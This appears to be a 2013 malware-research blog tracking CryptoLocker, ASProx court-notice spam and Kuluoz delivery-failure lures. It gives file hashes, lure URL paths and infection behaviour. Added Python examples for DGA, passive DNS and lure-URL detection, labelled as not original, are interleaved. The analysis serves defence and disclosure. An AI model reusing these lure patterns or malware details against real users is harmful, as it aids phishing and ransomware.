Sunday, December 29, 2013

Tracking CryptoLocker with Malcovery & IID

First things first: Here are some IP addresses that Malcovery thinks you should block immediately because they are linked to CryptoLocker. You'll see how as you read on!

UPDATED == Please add:,, to your blocking list!

A CryptoLocker walk-through

On December 19th, Malcovery malware analysts found two spam campaigns that were actively distributing malware that led to CryptoLocker. The first of these was the focus of that day’s T3 report, on AT&T-themed spam. The AT&T spam and the Visa spam from that day both dropped a small “downloader” piece of malware.

The AT&T email had an attached .zip file named which was 8,810 bytes in size and had the MD5 be7d2f4179d6d57827a18a20996a5a42. When unpacked, the included .exe file, VoiceMail.exe, was 15,872 bytes in size and had the MD5 d1ca2dc1b6d1c8b32665fcfa36be810b. At the time of the report, the only VirusTotal detections for that piece of malware were 5 of 49, with most major AV companies failing to detect.

VirusTotal Report 5 of 49

The downloaded Zeus sample, wav.exe, had an MD5 of a4bdb44128ca8ee0159f1de3cf11bee0 and was also very poorly detected. The VirusTotal report at that time showed only 8 of 49 detections. Of the major US-based AV, McAfee and TrendMicro detected it, both confirming a Zeus variant.

VirusTotal Report 8 of 49 detects

Immediately after becoming infected with the GameOver version of Zeus, the machine downloaded CryptoLocker malware from another site.
That file, dss.exe, had the MD5 of db482a193060f7d5b81d7779b9414009 and was almost entirely undetected, registering only 1 of 49 on VirusTotal at the time of the report, although it is now detected by more than 30 AV products. Only Chinese-based Rising software detected this as malware at the time we first saw it at Malcovery Security.

VirusTotal 1 of 49.


There are several interesting things we found as we examined this CryptoLocker sample. Perhaps the best way to explain them is to show some of these screenshots first.

#1. This was the first screen that we saw after infection, letting us know we needed to pay a $300 ransom if we wanted to decrypt our files.

#2. Our Windows wallpaper was replaced with this image, so we couldn't miss the fact that we were infected.

#3. There was a pull-down menu that gave us two choices of how we wanted to pay. The first choice was to pay 0.6 BitCoins.

#4. This is the BitCoin Account we were supposed to send our money to. We would appreciate anyone else who is infected sending out a tweet with the hashtag "#CryptoBitCoin" letting us know which BitCoin purse you were supposed to send payment to.

#5. We're trying to learn more about the option to pay with a GreenDot MoneyPak. Although we tried to make a payment this way, two valid MoneyPaks that we tried to send were rejected.

CryptoLocker & IID

The CryptoLocker malware has a Domain Generation Algorithm (DGA) that causes it to generate as many as a thousand domain names based on the date of the infection. As we ran the malware on several different occasions, we realized that of the thousands of tested domains, the domains that resolved tended to resolve to the same IP address.

In a DGA, bad guys attempt to protect their botnet by having many possible domain names generated using an algorithm that allows both the bots and the author to know what domains might be valid on a given date in the future. Each bot calculates the current domain possibilities, and begins "calling out" to each of those names. Most of them fail to resolve. But as long as even ONE domain resolves (meaning the criminals, or a sink-hole researcher, have registered the domain), the bot can make a connection to generate a valid encryption key and continue the scam. Once the date has passed, the domains are no longer useful, except as evidence, but if the IP addresses are being re-used, this gives us a way of protecting systems.
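One way to turn the "calling out" behaviour into a detection, as an added example that is not part of the original post or of Malcovery's or IID's tooling: flag clients that fail to resolve many distinct names in a short window, then collect the IPs returned for the few names that did resolve as blocklist candidates. The log format, thresholds, client addresses, domain names and IPs are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed burst window
MIN_FAILED = 8                 # assumed threshold of distinct failed names

# Constructed resolver log: timestamp, client, name, rcode, answer.
# Names use the reserved .example TLD; answers use documentation IP ranges.
FAILED = ["qwkdjvhrteas", "bnmxlpoyuwrc", "hgfdtrewqazx", "plokmijnuhby",
          "zxsdcvfgbnhj", "rtyfghvbnuio", "mnbvcxzlkjhg", "wsxedcrfvtgb",
          "yhnujmikolpq"]
SAMPLE_LOG = "\n".join(
    [f"2013-12-19T14:00:{i + 1:02d} 10.0.0.23 {n}.example NXDOMAIN -"
     for i, n in enumerate(FAILED)]
    + [
        "2013-12-19T14:00:10 10.0.0.23 xkqpmwvbzrtl.example NOERROR 192.0.2.10",
        "2013-12-19T14:00:30 10.0.0.23 www.example.com NOERROR 198.51.100.7",
        "2013-12-19T14:01:00 10.0.0.40 www.example.com NOERROR 198.51.100.7",
        "2013-12-19T14:01:05 10.0.0.40 mail.example.com NOERROR 198.51.100.8",
        "2013-12-19T14:01:09 10.0.0.40 wwww.example.com NXDOMAIN -",
    ]
)


def parse(log_text):
    """Parse the constructed five-column log into time-ordered records."""
    records = []
    for line in log_text.strip().splitlines():
        ts, client, name, rcode, answer = line.split()
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "name": name.lower().rstrip("."),
            "rcode": rcode,
            "answer": None if answer == "-" else answer,
        })
    return sorted(records, key=lambda r: r["ts"])


def find_dga_clients(records):
    """Return {client: (burst_start, burst_end)} for clients whose distinct
    failed lookups inside one WINDOW reach MIN_FAILED."""
    failures = defaultdict(list)
    for r in records:
        if r["rcode"] == "NXDOMAIN":
            failures[r["client"]].append(r)
    flagged = {}
    for client, recs in failures.items():
        start = 0
        for end in range(len(recs)):
            # Slide the left edge so the window never spans more than WINDOW.
            while recs[end]["ts"] - recs[start]["ts"] > WINDOW:
                start += 1
            distinct = {r["name"] for r in recs[start:end + 1]}
            if len(distinct) >= MIN_FAILED:
                flagged[client] = (recs[start]["ts"], recs[end]["ts"])
                break
    return flagged


def blocklist_candidates(records, flagged):
    """Map answer IP -> names for lookups that succeeded for a flagged client
    during or just after its burst and that no unflagged client asked for."""
    seen_by_others = {r["name"] for r in records if r["client"] not in flagged}
    candidates = defaultdict(set)
    for r in records:
        burst = flagged.get(r["client"])
        if not burst or r["rcode"] != "NOERROR" or r["answer"] is None:
            continue
        start, end = burst
        if start <= r["ts"] <= end + WINDOW and r["name"] not in seen_by_others:
            candidates[r["answer"]].add(r["name"])
    return dict(candidates)


if __name__ == "__main__":
    recs = parse(SAMPLE_LOG)
    hosts = find_dga_clients(recs)
    for client, (start, end) in hosts.items():
        print(f"{client}: NXDOMAIN burst {start} to {end}")
    for ip, names in blocklist_candidates(recs, hosts).items():
        print(f"candidate {ip}: {sorted(names)}")
```

Excluding names that unflagged clients also look up keeps ordinary browsing by the infected host out of the candidate list; candidates still need analyst confirmation before they go on a block list.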

Malcovery Security's daily "Today's Top Threat" reports share details about the top spam campaigns that are distributing malware. Recipients of the T3 reports would have been provided with all of the IP addresses, MD5s, and VirusTotal reports above as part of this report:

As happens in so many cases, the IP address warned about in this report provides lasting protection, as the same IP was used for CryptoLocker from that day forward. But were there other IP addresses involved as well?

Because Malcovery Security is a partner with Internet Identity, we ran the IP against their Passive DNS Database. IID's President Rod Rasmussen and Threat Intelligence VP Paul Ferguson gave us permission to share some of what we learned there.

CryptoLocker Domains found on

Were these other domains also used for CryptoLocker? YES! And here is one of the ways that we can tell. When you visit a CryptoLocker domain, there are two very interesting things about them. First, they offer Technical Support for their decryption service on these domains.

As we examine the NAMESERVER choices on the domains above, we can use the Passive DNS service to find other IP addresses that use some of the same Nameservers.

The fact that at various times this DNS server, known to be associated with CryptoLocker Domain Generation Algorithm-created Domain names, has been seen on these IP addresses makes these IP addresses of interest. But does it look like they are hosting CryptoLocker Domains as well as the DNS? We used the IID Passive DNS to find lists of domain names hosted on these various IP addresses, and then checked to see whether they were used for Technical Support *OR* for distribution of Binaries associated with the CryptoLocker malware. Let's look at what we found!

Our original IP address,, was very frequently associated with spam domains related to "Ruby Casino", a criminally operated online gaming service. The IID Passive DNS service showed us dozens of "Ruby" related domains on many of these other domains as well. For each of the other IP addresses, we'll ask:

- was a CryptoLocker TechSupport website found on this IP?
- was evidence of CryptoLocker Malware found on this IP?
- was this IP used by Ruby Casino spam domains?
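The pivot described above (seed IP, to the domains on it, to their nameservers, to the other IPs where those nameservers were seen, to the domains on those IPs) and the three questions, as an added example that is not IID's API or Malcovery's code. The record layout, the `MAX_NS_FANOUT` cut-off, the evidence tags and every domain and IP are constructed assumptions.

```python
from collections import defaultdict

MAX_NS_FANOUT = 4  # assumed cut-off; busier nameservers are treated as shared hosting

# Constructed passive DNS rows: (first_seen, rrtype, rrname, rdata).
PDNS = [
    ("2013-12-13", "A", "axkqwjrtyplm.example", "192.0.2.10"),
    ("2013-12-13", "NS", "axkqwjrtyplm.example", "ns1.dga-dns.example"),
    ("2013-12-13", "A", "rubycasino-win.example", "192.0.2.10"),
    ("2013-12-13", "NS", "rubycasino-win.example", "ns1.bigregistrar.example"),
    ("2013-12-13", "A", "ns1.dga-dns.example", "192.0.2.10"),
    ("2013-12-20", "A", "ns1.dga-dns.example", "198.51.100.20"),
    ("2013-12-27", "A", "ns1.dga-dns.example", "203.0.113.30"),
    ("2013-12-20", "A", "bvcnmzlkqwer.example", "198.51.100.20"),
    ("2013-12-20", "NS", "bvcnmzlkqwer.example", "ns1.dga-dns.example"),
    ("2013-12-21", "A", "ruby-slots.example", "198.51.100.20"),
    ("2013-12-27", "A", "pqowieurytla.example", "203.0.113.30"),
    ("2013-11-02", "A", "ns1.bigregistrar.example", "198.51.100.99"),
] + [("2013-11-02", "NS", f"shop{i}.example", "ns1.bigregistrar.example")
     for i in range(1, 5)]

# Constructed analyst observations per domain, standing in for the manual
# checks for a TechSupport page or a served binary.
EVIDENCE = {
    "axkqwjrtyplm.example": {"techsupport", "binary"},
    "bvcnmzlkqwer.example": {"techsupport"},
    "pqowieurytla.example": {"binary"},
}


def build_indexes(records):
    """Index the rows by IP, by name, and by nameserver."""
    a_by_ip, a_by_name = defaultdict(set), defaultdict(set)
    ns_by_domain, domains_by_ns = defaultdict(set), defaultdict(set)
    first_seen = {}
    for seen, rrtype, rrname, rdata in records:
        if rrtype == "A":
            a_by_ip[rdata].add(rrname)
            a_by_name[rrname].add(rdata)
            key = (rrname, rdata)
            first_seen[key] = min(seen, first_seen.get(key, seen))
        elif rrtype == "NS":
            ns_by_domain[rrname].add(rdata)
            domains_by_ns[rdata].add(rrname)
    return a_by_ip, a_by_name, ns_by_domain, domains_by_ns, first_seen


def pivot(seed_ip, records=PDNS):
    """Return {ip: {"domains", "ns_first_seen"}} for other IPs on which a
    nameserver used by the seed IP's domains has been seen."""
    a_by_ip, a_by_name, ns_by_domain, domains_by_ns, first_seen = build_indexes(records)
    ns_hosts = set(domains_by_ns)
    related = {}
    for domain in a_by_ip[seed_ip]:
        for ns in ns_by_domain[domain]:
            if len(domains_by_ns[ns]) > MAX_NS_FANOUT:
                continue  # registrar or parking nameserver: too generic to pivot on
            for ip in a_by_name[ns]:
                if ip == seed_ip:
                    continue
                related[ip] = {
                    "domains": a_by_ip[ip] - ns_hosts,
                    "ns_first_seen": first_seen[(ns, ip)],
                }
    return related


def assess(related, evidence=EVIDENCE):
    """Answer the three questions for every related IP."""
    report = {}
    for ip, info in related.items():
        tags = set().union(*(evidence.get(d, set()) for d in info["domains"]))
        report[ip] = {
            "techsupport": "techsupport" in tags,
            "malware": "binary" in tags,
            "ruby_casino": any("ruby" in d for d in info["domains"]),
            "ns_first_seen": info["ns_first_seen"],
        }
    return report


if __name__ == "__main__":
    for ip, answers in sorted(assess(pivot("192.0.2.10")).items()):
        print(ip, answers)
```

The fan-out cut-off matters in practice: a nameserver shared by thousands of unrelated customers would otherwise pull a registrar's whole address space into the result.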

On - - Positive for CryptoLocker TechSupport!
Confirmed (VT 40/48) CryptoLocker malware = file at /0388.exe!
Confirmed Ruby Casino domains!

On - - Positive for CryptoLocker TechSupport!
Confirmed CryptoLocker malware = file at /0388.exe
Previously used for Fake AV - see 0x3a blog post on Fake AV
Many Ruby Casino domains, such as,,

On - - Dec 28, 2013 - Positive for CryptoLocker!
Same binary (0388.exe) available here.
No Ruby Casino

On - - most CryptoLocker prior to December 6th.
Hosted malware on "" on October 31, 2013.
Many Ruby Casino domains, including and

On (Ukraine) - - most CryptoLocker prior to December 3rd.
Confirmed to have hosted Cryptolocker binary on November 21, 2013.
Many Ruby Casino domains, including and

On - - confirmed CryptoLocker on December 29th.
0388.exe binary available at IP or domain level.
Many Ruby Casino domains, including and

(, linked by IID Passive DNS based on common Ruby Casino domains on the previous IP address, was found to be actively hosting CryptoLocker Domains found here on October 30th confirmed to be CryptoLocker by our friends at Malware Must Die, including The most recent Crypto look alike was from December 10th.

- - confirmed CryptoLocker domain on December 27th.
This IP has not been seen prior to December 27th.

- not confirmed as CryptoLocker by passive DNS.
This IP *WAS* declared to be CryptoLocker in a new paper from Dell Secureworks' Keith Jarvis, more below.

- - confirmed CryptoLocker domain on December 29th.
Also hosted the domain mentioned above.
Hosted several Ruby Casino domains, including and

- dozens of CryptoLocker domains - confirmed TechSupport domains live on December 29th
0388.exe binary available on live domains, including
Hosted several Ruby Casino domains, including, and others.

Just on these IPs in the month of December, we find the following CryptoLocker domains:


We actually found THREE of the IP addresses that we found via Passive DNS analysis listed on a blog site in an article called CIS Cyber Alert Releases Recommendations to Combat Cryptlocker Malware by Thu Pham. That same article refers to a list of CryptoLocker C&C's that CIS is recommending to block. I list those IP addresses here from their list found at: CIS CryptoLocker List. Only three of the IP addresses listed by CIS are on our list of ten.

Keith Jarvis of Dell SecureWorks released an excellent paper on CryptoLocker Ransomware on December 18, 2013. I just found it tonight as I was Googling for additional evidence on some of the IP addresses above. I highly recommend this resource, available at Dell SecureWorks CryptoLocker Ransomware.

The same Dell Secureworks paper made me aware of the excellent thesis BitIodine: Extracting Intelligence from the Bitcoin Network by Michele Spagnuolo.

Friday, December 27, 2013

ASProx spamming Court-Related malware

Court-related malware from ASProx

Update - new version of malware December 27th @6:15AM. see bottom

The same spamming botnet that is sending the Delivery spam that imitates Walmart, CostCo and BestBuy has also been busy sending out Court-related spam.

So far, there have been 9 different malware samples distributed by this campaign, which began on December 23rd at approximately 7:45 AM (US Central Time GMT -6).

Here are the relative distributions of each, where the first number is the number of spam samples collected in the Malcovery Security Spam Data Mine. The second column is the domain name used, the third is the MD5 of the .zip attachment, and lastly, in 15 minute increments, the first and last time period in which spam bearing this attachment was seen.

11633 | | 442e746ad1d185dd1683b1aa964f6e56 (2013-12-23 07:45 to 2013-12-23 21:00)
5979 | | 267d9f829ea2e3620ee62c52fcb4ebe9 (2013-12-23 16:30 to 2013-12-24 05:15)

Email subjects with counts for JonesDay were:

5050 of Subject: Urgent court notice NR#
4738 of Subject: Hearing of your case in Court NR#
4150 of Subject: Notice of appearance in court NR#
3640 of Subject: Notice to appear in court NR#

4365 | | b2f8e5d86d7c50b5017e88527d8ce334 (2013-12-24 07:45 to 2013-12-24 20:00)
142 | | 76cdb2bad9582d23c1f6f4d868218d6c (2013-12-24 08:00 to 2013-12-24 16:00)
651 | | 0f0bb7b4f67b3bd90e944fcf7473b9d8 (2013-12-24 14:15 to 2013-12-24 20:00)

Email subjects with counts for Latham Watkins were:

1477 of Subject: Urgent court notice No#
1319 of Subject: Hearing of your case in Court No#
1251 of Subject: Notice of appearance in court No#
1110 of Subject: Notice to appear in court No#

3054 | | 30336df44c6808175bf4a7c212d3e2f8 (2013-12-25 14:15 to 2013-12-26 03:00)
3236 | | f97795c2124f60596eb8faf18307ac35 (2013-12-25 05:15 to 2013-12-25 23:00)

Email subjects with counts for Hogan Lovells were:

1785 of Subject: Urgent court notice WA#
1615 of Subject: Hearing of your case in Court WA#
1547 of Subject: Notice of appearance in court WA#
1334 of Subject: Notice to appear in court WA#

3500 | | d181af2b32830119c0538851a8b53af8 (2013-12-26 06:00 to 2013-12-26 16:30)
484 | | 7c572385f09773237805a52e2fc106e9 (2013-12-26 12:00 to 2013-12-26 17:15)

Email subjects with counts for McDermott Will and Emery were:

1172 of Subject: Urgent court notice CH#
1009 of Subject: Hearing of your case in Court CH#
962 of Subject: Notice of appearance in court CH#
838 of Subject: Notice to appear in court CH#

I think this might make a good time to talk about malware detection rates. I'm going to do a "re-analyze" of each of these files on VirusTotal. Let's start with the oldest one first.

My "442e7" jonesday sample is: which contains the file "Court_Notice_Jones_Day_Washington.exe" with an internal timestamp of 12/23/2013 5:24 PM and a size of 121,344 bytes and an MD5 of 6933c76f0fbabae32d9ed9275aa60899.

VirusTotal says? 33 of 48.

My "267d9" jonesday sample is which contains the file "Court_Notice_Jones_Day__Washington.exe" with an internal timestamp of 12/23/2013 8:40 PM and a size of 123,904 bytes and an MD5 of 84fae8803a2fcba2d5f868644cb55dd6.

VirusTotal says? 35 of 48. Please note that seven of the AV's correctly identify this as Kuluoz while some call it DoFoil, and one of the majors calls it "FakeAVLock". (This malware does NOT act like a Fake anti-virus, and does not lock your computer.)

My "b2f8e5" Latham & Watkins sample is: which contains the file "Court_Notice_Latham_and_Watkins__New_York.exe" with an internal timestamp of 12/24/2013 5:13 PM, 123,904 bytes in size, and an MD5 of ac572ca741df1bbcc88183e27e7fce6c.

VirusTotal says? 34 of 48. After 2 days and 19 hours since first submission.

My "30336" Hogan & Lovells sample is: which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 05:05 PM and 167,936 bytes in size and an MD5 of ebcb90d14904d596531fc8989c057f40.

VirusTotal says? 26 of 48. We still have one group calling it Zeus and one FakeAVLock. It's been on VT for 1 day and 12 hours at this point.

My "f9779" H&L sample is: which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 9:42 AM and 167,936 bytes in size and an MD5 of bd4255eacbf47649570c58061d81f018.

VirusTotal says? 25 of 48.

And now the ones from today. My "d181a" sample from MWE is which contains the file "Court_Notice_Chicago_McDermott_Will_and_Emery.exe" with an internal timestamp of 12/26/2013 at 12:41 PM and a size of 163,328 bytes and an MD5 of 225b15d05fe6f5d24d23b426fcfd7a2d.

VirusTotal says? 21 of 45.

And the most recent sample from MWE, "7c572", is which contains the file Court_Notice_McDermott_Will_and_Emery.exe with a timestamp of 12/26/2013 at 7:33 PM and a size of 163,328 bytes and an MD5 of c77ca2486d1517b511973ad1c923bb7d.

VirusTotal says? 21 of 46.

The AV Question

So, if we KNOW this is the same botnet, delivering the same malware, from the same family, why is the detection rate after three days only 75%? Why is the detection rate for Day four of the campaign still only 50% or less? Recently my friend Graham Cluley ran a guest-blog on his personal blog called The Massive Lie about Anti-Virus Technology. His guest blogger, Stephen Cobb, made this statement in the blog, his big prediction for 2014:

The media will repeat a massive lie about anti-virus technology. I predict that in 2014 every major newspaper and magazine will perpetuate, to the detriment of data security and human understanding, the grossly erroneous notion that “for an anti-virus firm to spot malware, it first needs to have seen the malware, recognized that it’s malicious code, and written a corresponding virus signature for its products.”

He goes on to say that anyone who believes that Anti-Virus has to develop a signature in order to detect malware is like Car & Driver magazine assuming that automobiles must still be started by turning a crank at the front of the car. The problem is, Stephen is wrong.

On day one of the "Court" version of this Kuluoz malware, would you like to see what the detection rate was of the malware that is now "33 of 48" on VirusTotal? Here's a clip from the Malcovery Security "Today's Top Threat" report for that day, which featured the "JonesDay" version of the malware mentioned above.

In that report, Malcovery malware analyst Brendan Griffin points out that beginning at 7:45 that morning we had seen 167 spam messages from this campaign in a single 15 minute period with the volume hitting 8932 messages by 2 PM.

The problem, of course, was that at 2 PM, only FOUR of the 48 Anti-virus products were detecting the malware as being something bad that should be blocked. Here's the VirusTotal report showing 4 of 47 detects at the time of Malcovery's report. Note the MD5's and assure yourself it is the same one that, three days later, is showing 33 of 48 above.

But wait! Didn't Mr. Cobb assure us that anti-virus products now detect malware in many clever ways that don't rely on writing signatures? Perhaps they do, but they certainly weren't doing it on this sample. I'm not sure which heuristic was supposed to be protecting us as we successfully infected ourselves and watched our traffic flow to the C&C server at on port 8080. I certainly agree that AV products should always be installed "in the suite" of security protections. Hostile URLs should be blocked, but the problem is that in a great many cases, no one is blocking anything. We *DID* report our C&C server's URL to, who assured us there was nothing malicious going on there (See URLQuery report for We also noted that the spam we were receiving was from IP addresses that were not being blocked by reputation at the beginning of this campaign, though later a good many of them were.

I told Graham that when I saw his headline "The Massive Lie about Anti-Virus" I was assuming it was THE OTHER massive lie. The one where we tell consumers, "please make sure you let your AV update itself automatically and everything will be ok!"

Updated - December 27, 2013 @ 6:15 AM Central time

The spam campaign has reverted back to senders. We've seen 50 new copies already this morning, with a new MD5.

The zip file is 195db522bfbf399ec4f89455e9f05088. My sample was named which contained the exe file Court_Notice_Jones_Day__Washington.exe which is 162,816 bytes in size and had an internal timestamp of 12/27/2013 08:52 AM. The .exe has an MD5 of 48e4b1e322e7c5fd53b6745e8b2409e6. VirusTotal reported a 12 of 46 detection rate.

Thursday, December 26, 2013

Holiday Delivery Failures lead to Kuluoz malware

As Christmas grew closer and people began to worry about whether their online purchases would reach their destinations in time to be placed beneath the Christmas Tree, online scammers decided to take advantage of this natural fear to install malware on the computers of unsuspecting nervous nellies. One television news program today interviewed a woman who had almost fallen for one of these scams in a story they called Costco Customers Targeted in Phishing Scam. In that story, the shopper, Marianne Bartley, said the email she had received told her a package had not been delivered and that she would receive a refund, but if she didn't fill out an online form, she would be penalized 21% of the purchase price.

The local news station, KOLO 8, contacted CostCo by telephone and received this automated warning:

"If you received an email concerning a delivery failure or cancellation: immediately delete the e-mail and do not reply. This is a phishing scam and was not sent by Costco. Costco is not affiliated with the e-mail in any way."

Here's the email that Marianne and hundreds of thousands of American Christmas shoppers have been receiving since December 19th at approximately 10 AM. The non-stop bombardment of spam continued throughout the day today, December 26th, and will likely continue tomorrow as well:

But it wasn't just CostCo. In fact, Walmart and BestBuy were also used in this spam campaign with emails that looked like these:

Each day the Malcovery Spam Data Mine processes more than a million spam email messages searching for dangerous threats like these and our analysts evaluate the threats and provide intelligence to customers to help them protect themselves. In this case, Malcovery has seen more than 3,000 copies of these "Delivery" emails, which come with one of several prominent Subject lines:

  • Express Delivery Failure
  • Standard Delivery Failure
  • Scheduled Home Delivery Problem
  • Delivery Canceling
  • Special Order Delivery Problem
  • Expedited Delivery Problem

The spam messages are being sent out by the ASProx spam-sending botnet. Although the emails can come from any username and any domain, the "Sender Name" (the human-friendly portion of the "From" address) has been consistent as one of these:

  • Best Buy
  • Best Buy Shipping Agent
  • Costco
  • Costco Shipping Agent
  • Costco Shipping Manager
  • Walmart
  • Walmart Delivery
  • Walmart Delivery Agent

What would happen if someone clicked on one of these emails? The actual destination would depend on which date and which email type they clicked on, but we have collected a fairly extensive list of destination websites. A full list of the 636 compromised websites that we have seen so far in this campaign is listed at the very end of this article. Just in the past four hours we've seen spam samples that went to each of these websites:

Each of those websites has been broken into by a criminal's hacking program which has created many subdirectories on the server, each starting with either "/media/" or "/messages/" followed by a long random-looking string, followed by a "Form Name". Here are a couple of recent examples:

/media/J4oHEmjaJvBvrdXTz3KJ5i7G46NP5/dGAYZ5aN4O qs=/CostcoForm
/media/fs1vp YmmEnb7Z6ftU5jKPU7X9Gc3DsasqKZPCIooRc=/WalmartForm
/media/9mz6i EkIDix5uVIAMa4AuEYNuNf18/32d3lFXUnyIQ=/CostcoForm

The "message" path (and the two BestBuy Forms) were more common earlier in the campaign. In fact, on the 19th, we ONLY saw BestBuy samples of the spam:

/message/zZFXQdfn98Ze1SQS7s6a9/yldS qZDpeIXu2C4RRif8=/BbForm
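A way to hunt for this URL layout in web-proxy logs, as an added example that is not part of the original post. All four sample paths above carry a 44-character token ending in "=", the shape of 32 base64-encoded bytes; the pattern below assumes that shape holds and that the spaces shown in the samples stand where a "+" was. The log format, client addresses and hostnames are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# prefix / 44-char base64-like token (may itself contain "/") / <Brand>Form
LURE_PATH = re.compile(
    r"^/(?P<prefix>media|message|messages)/"
    r"(?P<token>[A-Za-z0-9+/ ]{43}=)/"
    r"(?P<form>[A-Za-z]+Form)$"
)

# Constructed proxy log: timestamp, client, method, URL, status.
# Paths reuse two samples from this page on made-up .example hosts.
SAMPLE_PROXY_LOG = """\
2013-12-26T09:14:02 10.1.4.17 GET http://shop.example/media/J4oHEmjaJvBvrdXTz3KJ5i7G46NP5/dGAYZ5aN4O+qs=/CostcoForm 200
2013-12-26T09:15:40 10.1.4.52 GET http://blog.example/message/zZFXQdfn98Ze1SQS7s6a9/yldS%2BqZDpeIXu2C4RRif8%3D/BbForm 200
2013-12-26T09:16:11 10.1.4.52 GET http://news.example/media/uploads/2013/12/newsletter/ContactForm 200
2013-12-26T09:16:30 10.1.4.90 GET http://news.example/media/css/site.css 200
"""


def find_lure_hits(log_text):
    """Return one dict per request whose decoded path matches LURE_PATH."""
    hits = []
    for line in log_text.strip().splitlines():
        ts, client, _method, url, _status = line.split()
        parts = urlsplit(url)
        # Decode %2B / %3D / %20 first so encoded and raw forms match alike.
        match = LURE_PATH.match(unquote(parts.path))
        if match:
            hits.append({
                "ts": ts,
                "client": client,
                "host": parts.hostname,
                "prefix": match.group("prefix"),
                "form": match.group("form"),
            })
    return hits


def compromised_hosts(hits):
    """Group hits by destination host: host -> set of form names served."""
    by_host = defaultdict(set)
    for hit in hits:
        by_host[hit["host"]].add(hit["form"])
    return dict(by_host)


if __name__ == "__main__":
    found = find_lure_hits(SAMPLE_PROXY_LOG)
    for hit in found:
        print(hit["ts"], hit["client"], hit["host"], hit["form"])
    print(compromised_hosts(found))
```

The fixed token length is what keeps ordinary "/media/" upload paths that happen to end in "ContactForm" from matching.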

What happens first is that the website prompts the visitor to save or open the file "" (or whichever form they have visited.)

If they choose "Open" it will show them that there is a form to be extracted within the .zip file.

If extracted or moved to the Desktop, the form will display a comforting Microsoft Word logo, despite the ".exe" extension.

If the visitor tries to open the WalMartForm.exe program, they will get an error message, which is actually a file called WalmartForm.txt opening in Notepad:

If we check memory though, the program "WalMartForm.exe" has spawned an instance of "svchost.exe" which has some very interesting strings, including:

That IP is believed to be the Command & Control (C&C) server to which my infected computer instance is talking.

Other interesting strings include a "knock" tag:

(debug)5.1 x32  none  none(/debug)(/knock)

The location of some additional malware dropped from the server:

C:\Documents and Settings\Owner\Local Settings\Application Data\kinwmeiq.exe

And a tag that SEEMS to show the username of the malware author, though I'll not include that here . . .

Note that even though this malware distribution campaign has been running for at least seven days, many major anti-virus products are still unable to detect the malware as being malicious. A VirusTotal report showed that only 20 of 48 anti-virus products currently detect the malware that I received when visiting the most recent website seen in spam. Neither of the two locally installed AV products on my machine detects the malware, and the URL I attempted to visit was not marked as dangerous by any of the systems I have installed. VirusTotal Report here.

Hacked websites used to Deliver Delivery malware

Update -- the following destination domains seen on December 27th & December 28th.


Thursday, December 19, 2013

Help your compromised friends on Twitter and Facebook

Have some of your family and friends on Facebook or Twitter been posting some very strange messages recently? They have lost control of their accounts, possibly by entering their passwords on a phishing site, but more likely by having malware on their computer. At the bottom of this post, you'll find some tips on helping your friends by reporting the strange messages to Facebook and Twitter. You'll want to also advise them to update their anti-virus software and scan their computer for possible malware. Changing all of their passwords would be a Very Good Idea, but if they do it from a compromised computer, the bad guys will learn the new passwords as well.

Here are some details about recognizing compromised accounts for two recent scams -- "help identify the criminal" and "I quit my job, you should too!"

1. Facebook Friends want help identifying criminals

ysterday 4 dudes tried to steal my car. have youguys seen them? Here is their profile

ysterday 2 guys tried to steal my car. have youguys seen them? Here is the vid

ysterday 4 blackguys tried to steal my car. do you guys know them? Here is there pics

2days agos 2 white boys broke in my moms car. does anyone of you know them? Here is there pics

2 days agos 2 dudes tried to steal my car. have youguys seen them? Here is the vid

This morningg 5 dudes broke into my sisters house. have youguys seen them? Here is the vid

ysterday 5 black boys tried to steal my brothers car. does anyone of you know them? Here is the vid

3days agos 2 guys broke into my house. have youguys seen them? Here is their profile

Earlier todayy 3 dudes beat my dad up. have youguys seen them? Here is their profile

What are the odds that poor RS has had 3 guys steal his car, 5 guys break into his sister's car, and 2 dudes break into his brother's house in one week? Poor guy! How can we help him?

2. Facebook Friends quitting their job

From December 10th until yesterday, your friends weren't asking for help with criminals, they were all quitting their jobs! Messages like: I am finally quitting my j ob tomorrow after 14510 days of putting up with my idiot boss i just need to do it. I have no idea why i am workin' there anymore when ive been making about $200 dollars everyday for the past 6 months working at home. I am so happy I found this website -- with YOUR NAME and 21 others

One of my grad students at UAB was the first one to tip me off to this scam after his wife showed him suspicious posts for her friend! Our lesson? If you write malware, don't let it tag people who have family members working for me!

Sometimes the messages were about the dumb boss, idiot boss, childish boss, asss of a boss.

Your friend may have been "generating around" or "making around" some random number of dollars, $100, $200, $250, $300 for some random number of months.

As you can see from SO's page, the same people who have lost control of their accounts for the first scam are also targeted by the second scam:

When I was searching for the unique spelling of "QUIT MY J OB" with the space in the word Job, I noticed the posts were also all over Twitter:

Twitter => Facebook version

If the victim has both a Twitter and a Facebook account, the Twitter account drives traffic to the Facebook account that then sends them on to Tumblr.

Here is one of many dozens of examples where "JJ" had a twitter account that posts a link to a Facebook shortened "" link where JL has tagged seven of her friends in the message.

Instead of REPORTING THIS AS SUSPICIOUS, Her friend "Liked" the post!!!

AG had the same issue - his Twitter post sends traffic to the Facebook post, that sends to the Tumblr page.

VR's posts go the same way ... Twitter => Facebook => Tumblr

Quite a few other Twitter posts also send visitors to Facebook pages . . .

Twitter => Direct to Tumblr

Today we are seeing more of the Twitter links pointing directly to Tumblr, bypassing the Facebook component of the scam.

Help your Facebook Friends?

If one of your friends has had this happen to them, the best thing to do is to REPORT THE POST TO FACEBOOK, and then send them a message.

First, use the "pull down" arrow at the top right of the message to choose "Report/Mark as Spam"

After you hit "Report", click the WORD "Report" underneath the message to give more context to your report.

Tell them that this is "Spam or Scam" and hit "Continue"

After you get your Thank You from Facebook's Security team, follow the link to "Help Center Security section"

On that link, choose "Hacked Accounts" -- Note: You can share this link with your friends by telling them to visit: HTTPS://WWW.FACEBOOK.COM/HELP/SECURITY/

There are several good sets of information that can help your friend with the hacked account, or help you learn more about helping your friends! Be the Security Expert in your group of friends, share this information with them!

Help your Twitter Friends?

On Twitter, use the ...More button to begin your report

What happens on the TUMBLR Pages?

That part is still a work in progress . . . for now, trust me. Don't go there! I'll update here when I can share more details.

Saturday, December 14, 2013

Top Brands Imitated by Malicious Spam

